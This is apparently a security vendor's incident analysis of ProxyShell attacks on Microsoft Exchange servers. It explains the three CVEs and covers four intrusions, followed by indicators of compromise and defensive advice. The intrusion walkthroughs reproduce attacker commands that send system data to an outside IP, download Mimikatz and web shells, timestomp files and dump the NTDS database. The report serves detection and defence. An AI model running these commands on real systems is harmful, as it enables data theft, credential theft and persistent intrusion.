The Trend Micro™ Managed XDR team recently observed a surge in server-side compromises — ProxyShell-related intrusions on Microsoft Exchange in particular via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premise implementations of Microsoft Exchange.

In the engagements where the attacker’s objective was realised, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favour the use of exploits related to ProxyShell in order to establish initial access to an organisation’s system, with the possibility of ransomware attacks being launched down the line.

Using intrusion clusters that had overlaps in initial access techniques, we recently found a set of intrusions that were involved with attacks on the Middle East, which we will be dissecting in this blog entry. All of these intrusions, which share a commonality of exploiting vulnerable ProxyShell servers to gain an initial foothold on their target’s network, were rooted from an IIS Worker Process that was spawning suspicious processes.

Through our observation of the web shell activity on the Trend Micro Vision One Platform and by analysing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes that are associated with the different attack phases and how they tied in to the threat actor’s objective.

We clustered all the observed intrusions together to reveal some tactical and operational similarities between all the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whether LockFile, Conti, or any current active ransomware families in the Middle East threat landscape will be deployed as part of the routine).

In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.

Observations on the ProxyShell Exploitation

The exploitation of ProxyShell in these attacks involve three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 — the first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of these vulnerabilities can lead to arbitrary writing of files that an attacker can leverage to upload web shells on a target exchange server.

The malicious actor initially tried to start the attack by scanning for dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files showed a 404 error code when we tried to access them.

CVE-2021-34473: pre-auth path confusion

This vulnerability abuses the URL normalisation of Explicit Logon URL, where the login email will be removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITY\SYSTEM).

The Autodiscover service is abused to leak a known user’s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).

CVE-2021-34523: Exchange PowerShell Backend Elevation-of-Privilege

Microsoft Exchange has a PowerShell remoting feature which can be used to read and send emails. This functionality cannot be used by NT AUTHORITY\SYSTEM as it doesn’t have a mailbox, however, the backend /powershell can be provided via the X-Rps-CAT query string parameter in case it is accessed directly using the previous vulnerability, which will be deserialized and used to restore the user identity.

This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.

Figure 3. An attacker using local administrator account administrator@xxxx along with its SID

CVE-2021-31207: Post-auth Arbitrary-File-Write

This vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an arbitrary file location, which can be used to write a shell on the Exchange server.

Figure 4. Access to the web shell after being imported

The web shell is imported as mail inside the administrator[@]xxx draft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returned with 200 codes.

An analysis of the file system timeline shows the same — the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC)

Figure 5. The system timeline showing the creation of the file puqjc.aspx

Post-exploitation routines

A web shell is a piece of code written in web development programming language (e.g., ASP, JSP) that attackers can drop into web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim’s server, it can allow remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.

Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.

The following subsections go into the specifics of the post-exploitation routines we analysed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviours during infection, their post-exploitation routines varied.

Incident # 1

The first web shell

Figure 6. Code showing the exec_code query parameter

In the first incident we handled, we discovered that the web shell employed in the attack uses exec_code query parameter to execute ASP code. After successfully accessing the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.

"c:\windows\system32\cmd.exe" /c whoami
"c:\windows\system32\cmd.exe" /c ping -n 1 google.com

Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.

Figure 7. Executing PowerShell commands and downloading other malware

rundll.bat

The web shell includes a script that kills security software from specific vendors, and then disables the system’s firewall.

Figure 8. Code showing how the script terminates security software

It then executes a PowerShell-encoded base64 script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the CobaltStrike malware familly which has the ability to provide backdoor access to infected machines.

Figure. 9 Decoded PowerShell command to download and execute Cobalt Strike

Figure 10. Code from the Cobalt Strike obfuscated PowerShell

We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.

Figure 11. Script designed to kill PowerShell-related processes

Liferay CMS

The IP addresses 212.84.32[.]13 and 103.25.196[.]33, are servers using the Liferay content managing system (CMS). It seems that these are compromised versions of the software and being used to host the post-exploitation malicious payloads on different ports other than the default ones (80, 443, 8080) used by the CMS.

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident # 2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL with a high numbered port. Unfortunately, we don’t have information as to what was downloaded since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1 google.com
"c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"

The ipconfig command was executed as an argument for a wget request.

The following code shows the Powershell-encoded (top) and decoded (bottom) commands:

"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

"c:\windows\system32\cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"

The web shell then downloaded an additional.aspx web shell and timestamped it to further disguised itself in the system, seen in the following code:

Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"

The web shell was then moved to the OWA directory with the following time stamp:

$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;

After a few minutes, additional DLLs were created, which was later verified to be web shell files created either by w3wp.exe or UMWorkerProcess.exe.

c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll

In relation to this incident, we found the following malicious components and malware were used:

OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilised in their campaigns. The DLL web shell also had a corresponding ASPX version of it in the same system.

Figure 14. C# web shell function which executes the Base64 command in CMD

Figure 15. Web shell response for known inputs only, otherwise it will respond with error code 404

Incident #3

The third incident was different from the first two incidents in terms of credential dumping techniques and lateral movement within the system. In this case, the Microsoft Process Dump tool was used to dump LSSAS and extract the hashes.

Figure 16. The execution for procedump.exe during the active attack

The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.

A pass-the-hash attack technique was used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.

Figure 17. Using a pass-the-hash technique for remote access

The following malware were dropped on the infected machines:

CacheTask.dll (Backdoor.Win32.COTX.A)
dllhost.exe (PUA.Win64.LanGO.B)
HostDLL.exe (Trojan.Win64.OGNHOST.A)

Persistence was then created on remote machines via scheduled task to keep the backdoor running.

Figure 18. Creating persistence via scheduled task

Incident # 4

We analysed a fourth incident that had an interesting technique for credential dumping, specifically, dumping the database via the NT Directory Service Utility:

"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit

Execution Profile

Here is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.

Figure 19. Trend Micro Vision One ™ console showing the post-exploitation routine using a ProxyShell instance

Security recommendations

For the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams. Microsoft had written in August 2021 that patching to the latest cumulative update (CU) or security update (SU) are indeed the first line of defence against threats that exploit vulnerabilities related to ProxyShell.

While mitigation controls, such as the implementation of a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these servers, it should be noted that these controls would only buy time before any actual patching should occur, providing leeway for IT teams to allow them to trigger the appropriate change management controls.

It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it’s patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.

The implementation of proper segmentation for publicly-exposed servers should always be reviewed, with their behaviour (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers against web shell-based attacks.

Trend Micro Solutions

The capabilities of the Trend Micro Vision One™ platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities that are observed in a user’s environment by highlighting important attributes related to the attack.

Trend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organisations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth of global threat intelligence.

TrendMicro Detections

Product Name	Detections
Endpoint Security products: Real Time scan Behavior monitoring	Backdoor.ASP.CHOPPER.ASPGJI Backdoor.PHP.WEBSHELL.SBJKWQ Backdoor.ASP.WEBSHELL.UWMAQF ·Trojan.ASP.WEBSHELL.GIFCM Trojan.ASP.CVE202127065.E Trojan.PS1.COBEACON.SMYXAK-A TROJ_FRS.VSNW1FH21 Backdoor.Win32.COTX.A () PUA.Win64.LanGO.B Trojan.Win64.OGNHOST.A Fileless. AMSI.PSCoBeacon
Endpoint Security: Deep Security IPS:	1011041 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-34473) 1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2021-34523) 1011072 - Microsoft Exchange Server Security Feature Bypass Vulnerability (CVE-2021-31207)
Network Security: TippingPoint	39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability (CVE-2021-34473) 39534: HTTP: Microsoft Exchange Server PowerShell Code Execution Vulnerability (CVE-2021-34523) 40057: HTTP: Microsoft Exchange Server Arbitrary File Write Vulnerability (CVE-2021-31207)
Network Security: DDI Deep Discovery Inspector	CVE-2021-34473 - EXCHANGE SSRF EXPLOIT - HTTP(REQUEST) CVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)

Indicators of Compromise

Hashes

SHA256	Details	Detection Name
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066	rundll.bat	HackTool.BAT.WinDefKiller.C
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8	CacheTask.dll	Backdoor.Win32.COTX.A
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2	dllhost.exe	PUA.Win64.LanGO.B
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E	HostDLL.exe	Trojan.Win64.OGNHOST
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043		Trojan.PS1.COBEACON.SMYXAK-A

IPs & URL

hxxp:[//]103.25[.]196.33:51680[/]check.
hxxp:[//]212.84.32.13:18080[/]get
hxxps:[//]122.10.82.109:8090[/]connect
hxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx
103[.]25[.]196[.]33
212[.]84[.]32[.]13
122[.]10[.]82[.]109
209.14.0[.]234

Strings(IIS Logs)

autodiscover/autodiscover.json
@evil.corp
python-requests
/powershell/?X-Rps-CAT
cmd commands (whoami, taskkill, ping, dir, ipconfig)

Vulnerabilities

CVE-2021-34473
CVE-2021-34523
CVE-2021-31207

Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR